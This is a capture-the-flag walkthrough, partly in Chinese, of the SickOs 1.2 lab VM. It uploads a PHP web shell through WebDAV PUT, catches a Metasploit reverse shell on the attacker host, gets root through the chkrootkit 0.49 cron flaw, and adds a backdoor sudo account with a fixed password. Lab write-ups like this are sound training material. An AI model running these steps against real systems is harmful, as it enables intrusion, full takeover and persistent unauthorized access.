SickOs: 1.2

Reference

Writeup

Recon

  • dirb http://10.0.2.149

    -----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Oct 31 19:56:59 2016
URL_BASE: http://10.0.2.149/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.0.2.149/ ----
+ http://10.0.2.149/index.php (CODE:200|SIZE:163)

==> DIRECTORY: http://10.0.2.149/test/

---- Entering directory: http://10.0.2.149/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Mon Oct 31 19:57:04 2016
DOWNLOADED: 4612 - FOUND: 1

  • OPTIONS Methods

    root@kali:~# curl -v -X OPTIONS http://10.0.2.149/test
*   Trying 10.0.2.149...
* Connected to 10.0.2.149 (10.0.2.149) port 80 (#0)
> OPTIONS /test HTTP/1.1
> Host: 10.0.2.149
> User-Agent: curl/7.47.0
> Accept: */*
> 
< HTTP/1.1 301 Moved Permanently
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
    • 支援PUT method

Upload web shell

  • 產生shell.php,注意並不是每個port都可以用,看起來是被擋掉,試了幾個常見port只有443, 8080可用
  • 使用firefox add-on PosterPUT上傳
  • 或使用curl上傳:curl --upload-file shell.php -v http://10.0.2.149/test/shell.php -0,其中-0是使用HTTP 1.0

Get the reverse shell

  • msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.0.2.133
lhost => 10.0.2.133
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > run
[*] Started reverse TCP handler on 10.0.2.133:443 
[*] Starting the payload handler...
  • Trigger the reverse shell: curl http://10.0.2.149/test/shell.php
  • Spawn a tty
    shell
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

Exploit

  • 其中chkrootkit 0.49的版本有Local Privilege Escalation漏洞可利用
    ls -l /etc/cron.daily
chkrootkit -V
chkrootkit version 0.49
  • 查看exploit
    root@kali:~# searchsploit chkrootkit
--------------------------------------------- ----------------------------------
 Exploit Title                               |  Path
                                             | (/usr/share/exploitdb/platforms)
--------------------------------------------- ----------------------------------
Chkrootkit 0.49 - Local Root                 | ./linux/local/33899.txt
Chkrootkit - Local Privilege Escalation      | ./linux/local/38775.rb
--------------------------------------------- ----------------------------------

  • 使用metasploit搜尋exploit

    msf > search chkrootkit
Matching Modules
=========================================
   Name                           Disclosure Date  Rank    Description
   ----                           ---------------  ----    -----------
   exploit/unix/local/chkrootkit  2014-06-04       manual  Chkrootkit Local Privilege Escalation

    msf > info exploit/unix/local/chkrootkit
...
Payload information:

Description:
  Chkrootkit before 0.50 will run any executable file named 
  /tmp/update as root, allowing a trivial privilege escalation. 
  WfsDelay is set to 24h, since this is how often a chkrootkit scan is 
  scheduled by default.

  • 重新連上reverse shell,將目前session放到背景

    meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information             Connection
  --  ----                   -----------             ----------
  1   meterpreter php/linux  www-data (33) @ ubuntu  10.0.2.133:443 -> 10.0.2.149:60197 (10.0.2.149)

  • 使用、設定並執行chkrootkit payload

    msf exploit(handler) > use exploit/unix/local/chkrootkit
msf exploit(chkrootkit) > set SESSION 1
SESSION => 1
msf exploit(chkrootkit) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(chkrootkit) > set LHOST 10.0.2.133
LHOST => 10.0.2.133
msf exploit(chkrootkit) > set LPORT 8080
LPORT => 8080
msf exploit(chkrootkit) > run
[*] Exploit completed, but no session was created.

[*] Started reverse TCP double handler on 10.0.2.133:8080 
msf exploit(chkrootkit) > [!] Rooting depends on the crontab (this could take a while)
[*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...  
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo M01xMQXn6xqmXWCI;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "M01xMQXn6xqmXWCI\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (10.0.2.133:8080 -> 10.0.2.149:50756) at 2016-10-31 23:15:03 +0800
[+] Deleted /tmp/update

  • 取得root shell

    msf exploit(chkrootkit) > sessions -l

Active sessions
===============

  Id  Type                   Information             Connection
  --  ----                   -----------             ----------
  1   meterpreter php/linux  www-data (33) @ ubuntu  10.0.2.133:443 -> 10.0.2.149:60197 (10.0.2.149)
  2   shell unix                                     10.0.2.133:8080 -> 10.0.2.149:50756 (10.0.2.149)

msf exploit(chkrootkit) > sessions -i 2
[*] Starting interaction with 2...

1211555505
aInJpYftfRDnfxpjslWCtoyIGtRKBXmO
true
zXJjzWeZIBCKSAqPoFYxXJReoqrwVLxy
IPmvajLeuDetBmuZiRthKLMtQTpoxTRE
iPxhCiVRfysXvdlKeAmZpuBZsROFrgzf
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
  • 新建後門帳號
    /usr/sbin/useradd r00t
passwd r00t
Enter new UNIX password: t00r
Retype new UNIX password: t00r
passwd: password updated successfully
echo "r00t ALL=(ALL:ALL) ALL" >> /etc/sudoers
  • 切換使用者
    ssh [email protected]
sudo su -

  • 查看防火牆設定

    root@ubuntu:~# iptables -L
Chain INPUT (policy DROP)
target     prot opt source               destination
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:ssh
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:http
ACCEPT     tcp  --  anywhere             anywhere             tcp spt:http-alt
ACCEPT     tcp  --  anywhere             anywhere             tcp spt:https

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy DROP)
target     prot opt source               destination
ACCEPT     tcp  --  anywhere             anywhere             tcp spt:ssh
ACCEPT     tcp  --  anywhere             anywhere             tcp spt:http
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:http-alt
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:https

    root@ubuntu:~# cat newRule
# Generated by iptables-save v1.4.12 on Mon Apr 25 22:48:24 2016
*filter
:INPUT DROP [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT DROP [0:0]
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p tcp -m tcp --sport 8080 -j ACCEPT
-A INPUT -p tcp -m tcp --sport 443 -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 22 -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 80 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 8080 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 443 -j ACCEPT
COMMIT
# Completed on Mon Apr 25 22:48:24 2016
  • 看來只限制22, 80, 443, 8080進出,所以php reverse shell使用其它port號才都無法連

results matching ""

    No results matching ""